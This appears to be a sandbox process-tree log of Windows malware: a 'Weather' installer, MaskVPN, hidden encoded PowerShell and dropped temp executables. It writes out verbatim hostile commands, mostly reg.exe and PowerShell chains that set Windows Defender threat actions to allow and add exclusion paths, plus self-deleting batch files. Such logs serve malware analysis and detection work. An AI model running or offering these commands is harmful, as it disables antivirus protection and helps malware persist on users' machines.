C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5996

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F860EA611EF09878476B1381C89C894A C
2⤵
PID:5156

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6760B1FC13AC25733F45DA53E40397F5
2⤵
PID:5816

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
2⤵
PID:2516

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
3⤵
PID:7528

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
4⤵
PID:5940

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1c4,0x1f4,0x7ffd075e9ec0,0x7ffd075e9ed0,0x7ffd075e9ee0
5⤵
PID:8728

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1672 /prefetch:2
5⤵
PID:3796

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --mojo-platform-channel-handle=1724 /prefetch:8
5⤵
PID:8976

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --mojo-platform-channel-handle=2132 /prefetch:8
5⤵
PID:4828

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2648 /prefetch:1
5⤵
PID:3228

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --mojo-platform-channel-handle=3124 /prefetch:8
5⤵
PID:10084

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2204 /prefetch:2
5⤵
PID:10156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEF22.bat" "
3⤵
PID:4820

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
4⤵
- Views/modifies file attributes
PID:5656

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:7716

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEF22.bat"
4⤵
- Views/modifies file attributes
PID:9392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEF22.bat" "
4⤵
PID:9976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" cls"
4⤵
PID:9996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE1230.bat" "
3⤵
PID:8816

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
4⤵
- Views/modifies file attributes
PID:4340

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:7784

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:9496

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE1230.bat"
4⤵
- Views/modifies file attributes
PID:8284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE1230.bat" "
4⤵
PID:1120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" cls"
4⤵
PID:6292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6704

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5868

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\21658f08599e4d6c9e0d5ff0630cca4c /t 496 /p 4388
1⤵
PID:4000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6976

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7516

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:6616

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7fe56602-c39a-154a-8fc6-722b387f6b7f}\oemvista.inf" "9" "4d14a44ff" "0000000000000124" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:5920

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000124"
2⤵
PID:8012

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7684

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:4828

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:3500

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\900b70cf0c4044b8afb03aa862345146 /t 7692 /p 7516
1⤵
PID:8020

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\c4c37b1019d1481fad4b3763d3f12755 /t 7712 /p 7684
1⤵
PID:6220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffcf1c56e00,0x7ffcf1c56e10,0x7ffcf1c56e20
1⤵
PID:8136

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:7296

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:7796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1208

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7772

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7524

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\661be89f1f8249c5904abd7f0b0ff5be /t 800 /p 7772
1⤵
PID:4828

C:\Users\Admin\AppData\Local\Temp\55D4.tmp.exe
C:\Users\Admin\AppData\Local\Temp\55D4.tmp.exe
1⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\AqSWrSA.exe
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\AqSWrSA.exe 9n /site_id 754 /S
1⤵
PID:6412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:6856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:5840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:6508

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:9060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4700

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:5704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:8432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:7604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:6632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:7292

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:3464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:7520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:8132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:2936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:7892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:8960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:8448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4356

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:8072

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:9260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:9568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:9428

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3808

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:9712

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TZXwQNgcU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:9872

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TZXwQNgcU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:8712

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mDMOhBxZSaUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:8916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mDMOhBxZSaUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:9068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nZosbjLfGLdU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:10024

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nZosbjLfGLdU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:8652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogqTxBaMVNngTiWEorR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5172

C:\Windows\SysWOW64\reg.exe
